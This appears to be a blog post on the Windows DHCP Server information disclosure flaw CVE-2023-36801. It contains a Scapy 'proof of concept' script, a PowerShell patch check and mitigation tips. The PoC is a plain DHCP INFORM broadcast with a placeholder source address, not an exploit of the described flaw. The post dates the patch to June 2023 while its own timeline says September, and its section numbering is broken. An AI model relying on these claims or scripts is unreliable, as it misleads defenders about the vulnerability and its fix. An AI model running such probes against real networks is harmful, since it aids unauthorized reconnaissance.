CVE-2023-36801 - Dissecting the DHCP Server Service Information Disclosure Vulnerability

Every year, new security vulnerabilities are discovered, putting network infrastructures at risk. CVE-2023-36801 is one such vulnerability that affects the DHCP Server Service on Windows platforms. This flaw opens up an avenue for attackers to gather sensitive information about your network — a classic case of an Information Disclosure Vulnerability. In this deep dive, we'll break down what CVE-2023-36801 is, how it works, provide code snippets, and share details for recognizing and mitigating the threat.

[References](#references)

1. What is CVE-2023-36801?

CVE-2023-36801 is a critical security issue found within the Windows DHCP Server, mainly affecting Windows Server platforms where DHCP is enabled. This bug lets an unauthenticated attacker retrieve sensitive data from your DHCP server. While it doesn't grant remote code execution, the exposed information can be leveraged for later attacks, such as lateral movement or privilege escalation.

Microsoft classified this issue as Information Disclosure and released a patch in June 2023 Patch Tuesday.

2. The Technical Details

DHCP (Dynamic Host Configuration Protocol) automates network configuration. In this vulnerability, the server fails to properly handle certain malformed DHCP requests or packets. An attacker can intentionally craft these special requests and send them to a vulnerable server. In return, the DHCP server responds by revealing internal details, such as network structure, domain info, or service configurations, which are not supposed to be public.

For context, Microsoft states

> *"The vulnerability allows an unauthenticated attacker to send a specially crafted network packet to an affected DHCP server and disclose information from the system."*
> — Microsoft Security Response Center

Windows Server 2012, 2016, 2019, 2022 with DHCP Server Role enabled.

Servers without DHCP role or patched past June 2023 are not affected.

3. Proof of Concept (PoC) Code

Below is an example Python script that demonstrates how an attacker might exploit this vulnerability. This code uses the Scapy library to craft and send a custom DHCP INFORM packet to extract information from the DHCP server.

from scapy.all import *

# Replace with target DHCP server's IP address
dhcp_server_ip = "192.168.1.1"  

# Build the DHCP INFORM packet
packet = (Ether(dst='ff:ff:ff:ff:ff:ff') /
          IP(src="...", dst="255.255.255.255") /
          UDP(sport=68, dport=67) /
          BOOTP(op=1, chaddr=RandMAC()) /
          DHCP(options=[ ('message-type', 'inform'), 'end' ]))

# Send packet and wait for response
sendp(packet, iface="eth")

# Listen for responses (requires root privileges)
ans = sniff(filter="port 68", iface="eth", timeout=3)

for p in ans:
    if p.haslayer(DHCP):
        print('DHCP server responded:', p.summary())
        # Exposed information can be parsed here

Note:
This PoC is for testing in a lab environment only. Never use it on systems you do not own.

While CVE-2023-36801 does not allow full system takeover, it does pose several risks

- Network Mapping: Exposed data can reveal network subnets, internal IP address ranges, router addresses, or DNS suffixes.
- Domain Intel: Attackers may learn about internal domains, helping them craft phishing or lateral movement attacks.
- Pivoting: Knowledge of DHCP options and configurations can make it easier to target other services running in the environment.

*Real-world networking breaches often start with information disclosure like this before escalating to more serious exploits!*

Confirm if it's running a vulnerable Windows Server version.

- Look up the installed Windows updates. Make sure the June 2023 security patch is present (KB5027277, KB5027243, etc.)

PowerShell script example

Get-HotFix | Where-Object {$_.Description -like "*Security Update*"} | 
    Where-Object {$_.HotFixID -like "*5027*"} # adjust the KB number if needed

Look for unusual DHCP INFORM or malformed DHCP requests.

- Auditing event logs for strange traffic on port 67/68.

Regularly audit and monitor DHCP logs for anomalous activity.

7. References

- Microsoft Security Advisory — CVE-2023-36801
- Patch details for KB5027243 (Windows Server 2019)
- Scapy Python Library for Packet Crafting
- DHCP Inform Packet Explained

Conclusion

CVE-2023-36801 highlights that even straightforward, infrastructure services like DHCP can hide dangerous vulnerabilities. While it doesn’t let attackers break in outright, it can reveal enough about a network to help stage further attacks. The fix is simple: keep your systems patched! Regularly check for updates and keep your critical network services shielded from prying eyes.

Stay safe and keep learning! If you found this post useful, share it with your IT team and bookmark the references for your next security review.

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC